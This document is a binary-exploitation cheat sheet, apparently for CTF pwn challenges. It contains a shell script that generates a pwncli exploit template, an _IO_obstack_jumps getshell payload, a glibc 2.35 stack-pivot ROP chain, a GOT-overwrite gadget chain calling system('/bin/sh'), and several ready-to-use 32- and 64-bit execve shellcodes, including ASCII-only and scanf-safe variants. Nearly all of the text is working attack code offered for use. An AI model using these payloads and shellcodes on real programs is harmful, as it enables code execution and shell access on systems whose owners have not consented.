[cheatsheet]

pwncli_template

maybe u can use pwncli template in shell~LOL

#!/bin/sh

echo -n "#!/usr/bin/env python3
'''
Author:7resp4ss
Date:" > exp.py
ttime=`date +"%Y-%m-%d %H:%M:%S"`
echo  $ttime >> exp.py

echo "Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''
" >> exp.py

echo "from pwncli import *
cli_script()


io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename  = gift.filename # current filename
is_debug  = gift.debug # is debug or not 
is_remote = gift.remote # is remote or not
gdb_pid   = gift.gdb_pid # gdb pid if debug

if gift.remote:
    libc = ELF(\"./libc-2.23.so\")
    gift["libc"] = libc

" >> exp.py



echo "def cmd(i, prompt):
    sla(prompt, i)

def add():
    cmd('1')
    #......

def edit():
    cmd('2')
    #......

def show():
    cmd('3')
    #......

def dele():
    cmd('4')
    #......


ia()
">>exp.py
code exp.py

_IO_obstack_jump

• getshell:

payload = flat(
	{
		0x18:1,
		0x20:0,
		0x28:1,
		0x30:0,
		0x38:address_for_call,
		0x48:address_for_rdi,
		0x50:1,	
		0xd8:&_IO_obstack_jumps+0x20，
		0xe0:this_mem_address,
	},
	filler = '\x00'
)

• stack_migrate_final_in_2.35:

gg1 = libc.search(asm("mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]")).__next__() + libc_base
gg2 = libc.search(asm("mov rsp, rdx; ret")).__next__() + libc_base
gg3 = libc.search(asm('add rsp, 0x30; mov rax, r12; pop r12; ret')).__next__() + libc_base
flat(
    {
        0x0:gg3,
        0x8:[
            this_heap_address,
        ],
        0x20:[
            gg2
        ],
        0x40:
        [
            rop_payload,
        ],
    },
)

• magic_gadget_015dc3:

0x900:[
    CurrentGadgets.write_by_magic(elf.got.puts,libc.sym.puts,libc.sym.system),
    CurrentGadgets.pop_rdi_ret(),
    0x601060+0x980,
    CurrentGadgets.ret(),
    CurrentGadgets.ret(),
    elf.plt.puts
    ],
    0x980:'/bin/sh>&2\x00'

shellcode

# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

# 64位 较短的shellcode  23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

#call rdx
RRYh00AAX1A0hA004X1A4hA00AX1A8QX44Pj0X40PZPjAX4znoNDnRYZnCXAa

retf

to32='\xC7\x44\x24\x04\x23\x00\x00\x00\xCB'
to64='\xC7\x44\x24\x04\x33\x00\x00\x00\xCB'
# to32:                           ;;将CPU模式转换为32位
#     mov DWORD [rsp+4],0x23      ;;32位
#     retf
# to64:                           ;;将CPU模式转换为64位
#     mov DWORD [esp+4],0x33      ;;64位
#     retf